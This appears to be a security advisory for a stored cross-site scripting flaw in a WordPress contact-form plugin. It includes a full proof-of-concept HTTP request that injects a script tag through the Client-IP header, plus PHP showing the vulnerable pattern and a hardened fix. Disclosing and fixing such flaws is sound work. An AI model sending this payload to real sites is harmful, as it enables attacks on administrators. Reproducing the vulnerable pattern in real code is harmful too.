The plugin does not validate, sanitise or escape the IP address retrieved via headers such as CLIENT-IP and X-FORWARDED-FOR, allowing unauthenticated attackers to perform Cross-Site Scripting attacks against logged-in admins viewing the created entry.
POST /wp-json/contact-form-7/v1/contact-forms/1376/feedback HTTP/1.1
Accept: application/json, */*;q=0.1
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------9885500162977152723644841236
Content-Length: 963
Connection: close
Client-IP: <script>alert(/XSS/)</script>
Cookie: vx_user=61c2ecea43ad6164016458635903967

-----------------------------9885500162977152723644841236
Content-Disposition: form-data; name="_wpcf7"

1376
-----------------------------9885500162977152723644841236
Content-Disposition: form-data; name="_wpcf7_version"

5.5.3
-----------------------------9885500162977152723644841236
Content-Disposition: form-data; name="_wpcf7_locale"

en_US
-----------------------------9885500162977152723644841236
Content-Disposition: form-data; name="_wpcf7_unit_tag"

wpcf7-f1376-p1701-o1
-----------------------------9885500162977152723644841236
Content-Disposition: form-data; name="_wpcf7_container_post"

1701
-----------------------------9885500162977152723644841236
Content-Disposition: form-data; name="_wpcf7_posted_data_hash"

3e8ce0f47face5a3318813e733c3c774
-----------------------------9885500162977152723644841236
Content-Disposition: form-data; name="text-42"

Test
-----------------------------9885500162977152723644841236--
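The root cause is a header value that is stored verbatim and later echoed into an admin page. The following PHP is an added illustration, not the affected plugin's code: the function names are hypothetical, while filter_var() with FILTER_VALIDATE_IP is standard PHP and esc_html() is WordPress's HTML escaping helper. It shows the vulnerable pattern next to a hardened one that only accepts a syntactically valid IP literal and escapes on output regardless.

```php
<?php
// Added example (not the plugin's own code). Function names are hypothetical.

// Vulnerable pattern: the first non-empty header wins, unvalidated, and is
// rendered without escaping. A request carrying
//   Client-IP: <script>alert(/XSS/)</script>
// is therefore stored as-is and executes in the admin's browser.
function vulnerable_get_client_ip() {
    foreach ( array( 'HTTP_CLIENT_IP', 'HTTP_X_FORWARDED_FOR', 'REMOTE_ADDR' ) as $key ) {
        if ( ! empty( $_SERVER[ $key ] ) ) {
            return $_SERVER[ $key ];            // no validation
        }
    }
    return '';
}
function vulnerable_render_ip( $ip ) {
    echo '<td>' . $ip . '</td>';                // no output escaping
}

// Returns true only for a syntactically valid IPv4/IPv6 literal.
// Anything else (HTML, scripts, port suffixes, junk) is rejected.
function is_valid_ip_literal( $value ) {
    return filter_var( trim( (string) $value ), FILTER_VALIDATE_IP ) !== false;
}

// Hardened pattern: collect candidates (X-Forwarded-For may be a
// comma-separated chain; the first entry is the claimed client), keep the
// first one that validates, and store nothing at all if none does.
// Note: CLIENT-IP and X-FORWARDED-FOR are attacker-controlled unless a
// trusted proxy sets them; REMOTE_ADDR is the only value the web server
// itself fills in. Which headers to trust is a deployment decision.
function hardened_get_client_ip() {
    $candidates = array();
    if ( ! empty( $_SERVER['HTTP_CLIENT_IP'] ) ) {
        $candidates[] = $_SERVER['HTTP_CLIENT_IP'];
    }
    if ( ! empty( $_SERVER['HTTP_X_FORWARDED_FOR'] ) ) {
        $chain        = explode( ',', $_SERVER['HTTP_X_FORWARDED_FOR'] );
        $candidates[] = $chain[0];
    }
    if ( ! empty( $_SERVER['REMOTE_ADDR'] ) ) {
        $candidates[] = $_SERVER['REMOTE_ADDR'];
    }
    foreach ( $candidates as $candidate ) {
        if ( is_valid_ip_literal( $candidate ) ) {
            return trim( $candidate );          // validated IP literal
        }
    }
    return '';                                  // nothing valid: store nothing
}

// Escape at the point of output even though the value was validated on input;
// the two controls are independent and either one alone stops this bug.
function hardened_render_ip( $ip ) {
    echo '<td>' . esc_html( $ip ) . '</td>';
}

// Constructed demonstration (assumes the request from the advisory above):
$_SERVER['HTTP_CLIENT_IP'] = '<script>alert(/XSS/)</script>';
$_SERVER['REMOTE_ADDR']    = '198.51.100.7';    // constructed documentation address
var_dump( is_valid_ip_literal( $_SERVER['HTTP_CLIENT_IP'] ) ); // bool(false)
var_dump( hardened_get_client_ip() );                          // string "198.51.100.7"
```

Validation on input keeps the stored entry clean; escaping on output protects the admin view even if an unvalidated value reaches the database by another path.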
Gaetano Perrone
Gaetano Perrone
Yes
2021-01-05 (about 2 years ago)
2021-12-22 (about 1 years ago)
2022-04-16 (about 9 months ago)